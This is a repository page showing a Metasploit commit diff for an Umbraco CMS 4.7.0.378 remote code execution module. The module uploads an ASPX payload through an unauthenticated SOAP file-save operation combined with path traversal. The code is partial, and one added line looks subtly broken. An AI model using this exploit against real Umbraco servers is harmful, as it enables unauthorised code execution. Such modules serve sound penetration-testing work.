infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

User of TARGETURI plus improve of description

unstable
jvazquez-r7 2012-07-06 15:47:25 +02:00
parent 7751c54a52
commit 9fecc80459
1 changed files with 18 additions and 11 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

29
modules/exploits/windows/http/umbraco_upload_aspx.rb
View File

@ -17,24 +17,29 @@ class Metasploit3 < Msf::Exploit::Remote
super(
'Name' => 'Umbraco CMS Remote Command Execution',
'Description' => %q{
This module can be used to execute a payload on Umbraco CMS
4.7.0.378. The payload is uploaded as an ASPX script by
sending a specially crafted SOAP request to codeEditorSave.asmx,
which permits unauthorised file upload via the SaveDLRScript operation.
SaveDLRScript is also subject to a path traversal vulnerability,
allowing code to be placed into the web-accessible /umbraco/ directory.
This module can be used to execute a payload on Umbraco CMS 4.7.0.378.
The payload is uploaded as an ASPX script by sending a specially crafted
SOAP request to codeEditorSave.asmx, which permits unauthorised file upload
via the SaveDLRScript operation. SaveDLRScript is also subject to a path
traversal vulnerability, allowing code to be placed into the web-accessible
/umbraco/ directory.
The module writes, executes and then overwrites an ASPX script; note that
though the script content is removed, the file remains on the target.
though the script content is removed, the file remains on the target. Automatic
cleanup of the file is intended if a meterpreter payload is used.
This module has been tested successfully on Umbraco CMS 4.7.0.378 on a Windows
7 32-bit SP1. In this scenario, the "IIS APPPOOL\ASP.NET v4.0" user must have
write permissions on the Windows Temp folder.
},
'Author' => [
'Toby Clarke' # Vulnerability discovery and Metasploit module
],
'Version' => '$Revision: $',
'Platform' => 'win',
'References' =>
[
[ 'URL', 'http://blog.gdssecurity.com/labs/2012/7/3/find-bugs-faster-with-a-webmatrix-local-reference-instance.html' ]
[ 'URL', 'http://blog.gdssecurity.com/labs/2012/7/3/find-bugs-faster-with-a-webmatrix-local-reference-instance.html' ],
[ 'URL', 'http://umbraco.codeplex.com/workitem/18192' ] # Item deleted for security reasons
],
'Targets' =>
[
@ -47,7 +52,7 @@ class Metasploit3 < Msf::Exploit::Remote
register_options(
[
OptString.new('PATH', [ true, "The URI path of the Umbraco login page", '/umbraco'])
OptString.new('TARGETURI', [true, 'The URI path of the Umbraco login page', '/umbraco/'])
], self.class)
end
@ -94,7 +99,9 @@ class Metasploit3 < Msf::Exploit::Remote
# htmlentities like encoding
aspx = aspx.gsub("&", "&amp;").gsub("\"", "&quot;").gsub("'", "&#039;").gsub("<", "&lt;").gsub(">", "&gt;")
uri_path = (datastore['PATH'][-1,1] == "/" ? datastore['PATH'] : datastore['PATH'] + "/")
uri_path = target_uri.path
uri_path.path << "/" if uri_path[-1, 1] != "/"
@upload_random = rand_text_alpha(rand(6) + 6)
soap = <<-eos